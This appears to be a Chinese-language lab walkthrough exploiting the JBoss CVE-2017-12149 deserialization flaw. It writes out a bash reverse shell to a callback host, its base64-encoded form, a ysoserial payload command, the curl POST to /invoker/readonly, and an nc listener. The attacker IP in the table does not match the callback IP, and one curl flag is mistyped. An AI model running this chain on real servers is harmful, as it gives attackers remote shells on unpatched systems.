Jboss CVE-2017-12149反序列化漏洞
漏洞描述
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 httpinvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
实验环境
| 主机 | 角色 | IP |
|---|---|---|
| centos8 | 漏洞靶机 | 192.168.1.80 |
| windows10 | 攻击机 | 192.168.1.120 |
实验流程
启动漏洞环境centos8
service docker start
cd /usr/sbin/vulhub/jboss/CVE-2017-12149
docker-compose build
docker-compose up -d
尝试访问漏洞页面:
bash -i >& /dev/tcp/192.168.1.125/8888 0>&1
编码后(在线编码):
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}
序列化数据生成:
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI1Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser
用curl命令,将poc.ser以post请求的方式发送到/invoker/readonly。
curl http://192.168.1.80:8080/invoker/readonly --data--binary @poc.ser
如图所示,成功反弹shell:
nc -lvp 8888
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
